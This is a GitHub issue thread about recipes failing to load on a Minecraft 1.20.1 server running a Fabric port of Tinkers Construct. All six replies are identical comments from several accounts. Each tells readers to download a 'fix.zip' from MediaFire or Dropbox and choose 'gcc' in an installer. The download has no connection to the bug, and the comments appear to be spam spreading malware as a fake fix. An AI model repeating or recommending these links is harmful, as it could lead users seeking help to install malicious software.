### ISSUE TITLE
All recipes not working on server

### ISSUE THREAD

**Issue by Artmoby7674** [Alpha-s-Stuff/TinkersConstruct#146]
### Minecraft Version

1.20.1

### Fabric Version

0.16.0

### Fabric API Version

0.92.2+1.20.1

### Hephaestus Version

1.20.1-3.6.4.279

### Describe your issue

I opened a server and the recipes don't show on JEI and don't have an output when put together manually. "Load my F**ing Tags" didn't do anything.
![image](https://github.com/user-attachments/assets/67daaefe-ff47-494c-b07e-d45f215e6710)

### Crash Report
(https://mclo.gs/PzLkVhB)

### Other mods

Sodium, Create (plus addons), Ad Astra, AE2, Industrial Revolution, Immersive Portals, Automobillity, JEI

Performance ones:
FerriteCore, Iris, EntiyCulling, Lithium, ImmediatelyFast, Sodium Extra, ModernFix, Dynamic FPS, Memory Leak Fix, Krypton, LazyDFU, Starlight.

### Tried reproducing with just Tinkers?

No

### Performance Enchancers

Sodium, Other (specify under other mods)

### Searched for known issues?

Checked pinned issues, Searched open issues, Searched closed issues

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
